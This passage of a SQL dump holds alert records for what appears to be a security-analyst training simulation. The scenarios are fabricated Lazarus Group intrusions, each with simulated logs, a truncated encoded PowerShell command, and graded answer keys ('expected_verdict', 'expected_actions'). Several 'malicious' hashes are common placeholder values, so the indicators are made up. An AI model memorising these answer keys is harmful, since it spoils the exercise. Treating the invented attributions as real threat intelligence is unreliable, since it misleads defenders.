3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:32:00Z\\\",\\\"event_type\\\":\\\"authentication_failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"jdoe\\\",\\\"failed_attempts\\\":5,\\\"method\\\":\\\"dictionary_attack\\\",\\\"associated_malware\\\":{\\\"name\\\":\\\"WannaCry\\\",\\\"hash\\\":\\\"f7a2edb1b4567e2d5f8e8497c9a3f378\\\",\\\"filename\\\":\\\"wannacry.exe\\\"},\\\"indicator_of_compromise\\\":[\\\"source_ip\\\",\\\"associated_malware\\\"]}\"},{\"timestamp\":\"2026-03-02T13:51:06.873Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:32:00Z\\\",\\\"event_type\\\":\\\"authentication_failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"jdoe\\\",\\\"failed_attempts\\\":5,\\\"method\\\":\\\"dictionary_attack\\\",\\\"associated_malware\\\":{\\\"name\\\":\\\"WannaCry\\\",\\\"hash\\\":\\\"f7a2edb1b4567e2d5f8e8497c9a3f378\\\",\\\"filename\\\":\\\"wannacry.exe\\\"},\\\"indicator_of_compromise\\\":[\\\"source_ip\\\",\\\"associated_malware\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1364, 'Lateral Movement with Compromised Accounts', 'high', 'Active Directory Monitoring', 'An advanced lateral movement attempt was detected where compromised accounts were used to access blockchain developer networks. The attackers are leveraging stolen credentials to exfiltrate sensitive data and exploit vulnerabilities within the blockchain development environment.', 'Account Compromise', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:00Z\",\"event_id\":\"4624\",\"logon_type\":\"3\",\"user\":\"dev_jdoe\",\"source_ip\":\"45.76.154.92\",\"destination_ip\":\"192.168.1.15\",\"process_name\":\"cmd.exe\",\"file_name\":\"blockchain_project.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"domain\":\"blockchain.local\",\"status\":\"Success\"}', '2026-03-01 23:02:30', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"dev_jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised developer account used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.154.92\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known IP used by Lazarus Group for cyber operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially unwanted applications.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"blockchain_project.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unknown file accessed during the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1365, 'Exfiltration of Cryptocurrency Assets', 'critical', 'Cryptocurrency Transaction Monitoring', 'The final stage of the operation involves exfiltrating cryptocurrency assets from compromised wallets to accounts controlled by the Lazarus Group. The transaction monitoring system detected a suspicious transfer of 50 BTC from a previously compromised wallet to an address associated with known malicious activity.', 'Data Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:45:00Z\",\"transaction_id\":\"tx1234567890abcdef\",\"source_wallet\":\"1A2b3C4d5E6F7G8H9I0J\",\"destination_wallet\":\"3K4m5N6o7P8Q9R0S1T2U\",\"amount\":\"50 BTC\",\"transaction_fee\":\"0.0005 BTC\",\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"compromised_user\",\"internal_ip\":\"192.168.1.25\",\"malicious_activity\":true}', '2026-03-01 23:02:30', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with Lazarus Group operations.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"User account used in unauthorized cryptocurrency transactions.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised 
host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.876Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:00Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_wallet\\\":\\\"1A2b3C4d5E6F7G8H9I0J\\\",\\\"destination_wallet\\\":\\\"3K4m5N6o7P8Q9R0S1T2U\\\",\\\"amount\\\":\\\"50 BTC\\\",\\\"transaction_fee\\\":\\\"0.0005 BTC\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"malicious_activity\\\":true}\"},{\"timestamp\":\"2026-03-02T13:54:06.876Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:00Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_wallet\\\":\\\"1A2b3C4d5E6F7G8H9I0J\\\",\\\"destination_wallet\\\":\\\"3K4m5N6o7P8Q9R0S1T2U\\\",\\\"amount\\\":\\\"50 BTC\\\",\\\"transaction_fee\\\":\\\"0.0005 BTC\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"malicious_activity\\\":true}\"},{\"timestamp\":\"2026-03-02T13:53:06.876Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:00Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_wallet\\\":\\\"1A2b3C4d5E6F7G8H9I0J\\\",\\\"destination_wallet\\\":\\\"3K4m5N6o7P8Q9R0S1T2U\\\",\\\"amount\\\":\\\"50 BTC\\\",\\\"transaction_fee\\\":\\\"0.0005 BTC\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"malicious_activity\\\":true}\"},{\"timestamp\":\"2026-03-02T13:52:06.876Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:00Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_wallet\\\":\\\"1A2b3C4d5E6F7G8H9I0J\\\",\\\"destination_wallet\\\":\\\"3K4m5N6o7P8Q9R0S1T2U\\\",\\\"amount\\\":\\\"50 BTC\\\",\\\"transaction_fee\\\":\\\"0.0005 BTC\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"malicious_activity\\\":true}\"},{\"timestamp\":\"2026-03-02T13:51:06.876Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:00Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_wallet\\\":\\\"1A2b3C4d5E6F7G8H9I0J\\\",\\\"destination_wallet\\\":\\\"3K4m5N6o7P8Q9R0S1T2U\\\",\\\"amount\\\":\\\"50 BTC\\\",\\\"transaction_fee\\\":\\\"0.0005 BTC\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"malicious_activity\\\":true}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1366, 'Suspicious LinkedIn Connection Request', 'medium', 'LinkedIn activity logs', 'An aerospace engineer has received a connection request from a profile claiming to be a recruiter with a suspicious job offer. The profile is suspected to be fake and may be part of a social engineering attempt to gain initial access.', 'Social Engineering', 'T1566.002 - Spearphishing Link', 1, 'Closed', 232, '{\"event_time\":\"2023-10-15T14:23:52Z\",\"user_id\":\"aero.eng123\",\"user_email\":\"engineer@aerospaceco.com\",\"connection_request_id\":\"req_987654321\",\"requester_profile\":{\"name\":\"John Doe\",\"profile_url\":\"https://linkedin.com/in/johndoe-fake\",\"headline\":\"Senior Recruiter at TopTech Talent\",\"email\":\"john.doe@toptechtalent.com\",\"ip_address\":\"203.0.113.45\"},\"job_offer_details\":{\"position\":\"Project Manager\",\"location\":\"Remote\",\"salary\":\"150,000 USD\",\"offer_link\":\"http://maliciouslink.com/joboffer\"},\"internal_ip\":\"192.168.1.10\",\"notable_hash\":\"4d6f6e6579726174696f6e68617368\"}', '2026-03-01 23:03:23', '2026-03-14 16:41:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@toptechtalent.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Email domain does not match known recruitment agencies.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciouslink.com/joboffer\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Service\",\"verdict\":\"malicious\",\"details\":\"URL linked to malware 
distribution.\"}}],\"recommended_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.877Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"user_id\\\":\\\"aero.eng123\\\",\\\"user_email\\\":\\\"engineer@aerospaceco.com\\\",\\\"connection_request_id\\\":\\\"req_987654321\\\",\\\"requester_profile\\\":{\\\"name\\\":\\\"John Doe\\\",\\\"profile_url\\\":\\\"https://linkedin.com/in/johndoe-fake\\\",\\\"headline\\\":\\\"Senior Recruiter at TopTech Talent\\\",\\\"email\\\":\\\"john.doe@toptechtalent.com\\\",\\\"ip_address\\\":\\\"203.0.113.45\\\"},\\\"job_offer_details\\\":{\\\"position\\\":\\\"Project Manager\\\",\\\"location\\\":\\\"Remote\\\",\\\"salary\\\":\\\"150,000 USD\\\",\\\"offer_link\\\":\\\"http://maliciouslink.com/joboffer\\\"},\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"notable_hash\\\":\\\"4d6f6e6579726174696f6e68617368\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.877Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"user_id\\\":\\\"aero.eng123\\\",\\\"user_email\\\":\\\"engineer@aerospaceco.com\\\",\\\"connection_request_id\\\":\\\"req_987654321\\\",\\\"requester_profile\\\":{\\\"name\\\":\\\"John Doe\\\",\\\"profile_url\\\":\\\"https://linkedin.com/in/johndoe-fake\\\",\\\"headline\\\":\\\"Senior Recruiter at TopTech 
Talent\\\",\\\"email\\\":\\\"john.doe@toptechtalent.com\\\",\\\"ip_address\\\":\\\"203.0.113.45\\\"},\\\"job_offer_details\\\":{\\\"position\\\":\\\"Project Manager\\\",\\\"location\\\":\\\"Remote\\\",\\\"salary\\\":\\\"150,000 USD\\\",\\\"offer_link\\\":\\\"http://maliciouslink.com/joboffer\\\"},\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"notable_hash\\\":\\\"4d6f6e6579726174696f6e68617368\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.877Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"user_id\\\":\\\"aero.eng123\\\",\\\"user_email\\\":\\\"engineer@aerospaceco.com\\\",\\\"connection_request_id\\\":\\\"req_987654321\\\",\\\"requester_profile\\\":{\\\"name\\\":\\\"John Doe\\\",\\\"profile_url\\\":\\\"https://linkedin.com/in/johndoe-fake\\\",\\\"headline\\\":\\\"Senior Recruiter at TopTech Talent\\\",\\\"email\\\":\\\"john.doe@toptechtalent.com\\\",\\\"ip_address\\\":\\\"203.0.113.45\\\"},\\\"job_offer_details\\\":{\\\"position\\\":\\\"Project Manager\\\",\\\"location\\\":\\\"Remote\\\",\\\"salary\\\":\\\"150,000 USD\\\",\\\"offer_link\\\":\\\"http://maliciouslink.com/joboffer\\\"},\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"notable_hash\\\":\\\"4d6f6e6579726174696f6e68617368\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.877Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"user_id\\\":\\\"aero.eng123\\\",\\\"user_email\\\":\\\"engineer@aerospaceco.com\\\",\\\"connection_request_id\\\":\\\"req_987654321\\\",\\\"requester_profile\\\":{\\\"name\\\":\\\"John Doe\\\",\\\"profile_url\\\":\\\"https://linkedin.com/in/johndoe-fake\\\",\\\"headline\\\":\\\"Senior Recruiter at TopTech 
Talent\\\",\\\"email\\\":\\\"john.doe@toptechtalent.com\\\",\\\"ip_address\\\":\\\"203.0.113.45\\\"},\\\"job_offer_details\\\":{\\\"position\\\":\\\"Project Manager\\\",\\\"location\\\":\\\"Remote\\\",\\\"salary\\\":\\\"150,000 USD\\\",\\\"offer_link\\\":\\\"http://maliciouslink.com/joboffer\\\"},\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"notable_hash\\\":\\\"4d6f6e6579726174696f6e68617368\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.877Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"user_id\\\":\\\"aero.eng123\\\",\\\"user_email\\\":\\\"engineer@aerospaceco.com\\\",\\\"connection_request_id\\\":\\\"req_987654321\\\",\\\"requester_profile\\\":{\\\"name\\\":\\\"John Doe\\\",\\\"profile_url\\\":\\\"https://linkedin.com/in/johndoe-fake\\\",\\\"headline\\\":\\\"Senior Recruiter at TopTech Talent\\\",\\\"email\\\":\\\"john.doe@toptechtalent.com\\\",\\\"ip_address\\\":\\\"203.0.113.45\\\"},\\\"job_offer_details\\\":{\\\"position\\\":\\\"Project Manager\\\",\\\"location\\\":\\\"Remote\\\",\\\"salary\\\":\\\"150,000 USD\\\",\\\"offer_link\\\":\\\"http://maliciouslink.com/joboffer\\\"},\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"notable_hash\\\":\\\"4d6f6e6579726174696f6e68617368\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1367, 'Malicious Attachment in Follow-up Email', 'high', 'Corporate email gateway', 'An email with a job offer attachment was received, containing a trojan designed to execute upon opening. The attachment was identified as a known malicious artifact linked to Lazarus Group activities.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"email_sender\":\"hr@fakesite.com\",\"email_recipient\":\"jdoe@corporate.com\",\"subject\":\"Job Offer\",\"attachment\":{\"filename\":\"Job_Offer_Details.docx\",\"hash\":\"7f5a8d7e5b9c4a6d9c3a7a8b5c6d4e5f\",\"file_type\":\"docx\"},\"malware_signature\":\"Trojan:Win32/FakeOffer\",\"indicators\":{\"attachment_hash\":\"7f5a8d7e5b9c4a6d9c3a7a8b5c6d4e5f\",\"malicious_ip\":\"203.0.113.45\"}}', '2026-03-01 23:03:23', '2026-03-14 16:42:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns by Lazarus Group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"7f5a8d7e5b9c4a6d9c3a7a8b5c6d4e5f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known trojan used in targeted phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"hr@fakesite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Database\",\"verdict\":\"suspicious\",\"details\":\"Email domain recently registered and used in phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Attachment in Follow-up Email\",\"date\":\"2026-03-02T13:55:06.879Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1368, 'Establishment of Remote Access Trojan (RAT)', 'critical', 'Endpoint protection logs', 'A Remote Access Trojan (RAT) named \'Backdoor.LazarusRat\' was detected on the victim\'s machine, allowing persistent access for the attacker. The RAT installation was initiated from a suspicious IP address, and files associated with the Lazarus Group were found.', 'Malware', 'T1219 - Remote Access Tools', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"RAT-Installation\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"process_name\":\"svchost.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"lazarus_rat.dll\",\"username\":\"victim_user\",\"action\":\"File created\",\"threat_name\":\"Backdoor.LazarusRat\",\"severity\":\"Critical\"}', '2026-03-01 23:03:23', '2026-03-14 16:42:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Victim\'s machine internal IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Lazarus RAT.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lazarus_rat.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"Malicious DLL used for RAT installation.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"victim_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user 
account on the compromised machine.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1369, 'Lateral Movement to Secure Network Segments', 'high', 'Network traffic analysis', 'Using compromised credentials, the attacker moves laterally to access secure segments of the network. This activity is consistent with the Lazarus Group\'s known tactics.', 'Network Intrusion', 'T1021 - Remote Services', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-10T14:35:17Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.23\",\"protocol\":\"RDP\",\"action\":\"allowed\",\"username\":\"jdoe\",\"auth_method\":\"NTLM\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"confidential_project.docx\",\"event_description\":\"Successful RDP connection using compromised credentials\",\"network_segment\":\"Sensitive_Segment_A\",\"severity\":\"High\"}', '2026-03-01 23:03:23', '2026-03-14 16:43:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network segment for sensitive projects\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1370, 'Data Exfiltration Attempt Detected', 'critical', 'Data loss prevention system', 'An exfiltration attempt was detected where classified project files were being transferred to a known malicious remote server. The attack was executed by a threat actor using advanced techniques indicative of the Lazarus Group.', 'Data Breach', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', 232, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"DLP-EXFIL-20231015\",\"source_ip\":\"192.168.1.45\",\"source_username\":\"jdoe\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"classified_project_files.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"Blocked\",\"alert_reason\":\"Exfiltration attempt to known malicious IP\",\"reference\":\"Lazarus Group TTPs\",\"related_malware\":\"WannaCry\"}', '2026-03-01 23:03:23', '2026-03-14 16:43:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Lazarus Group 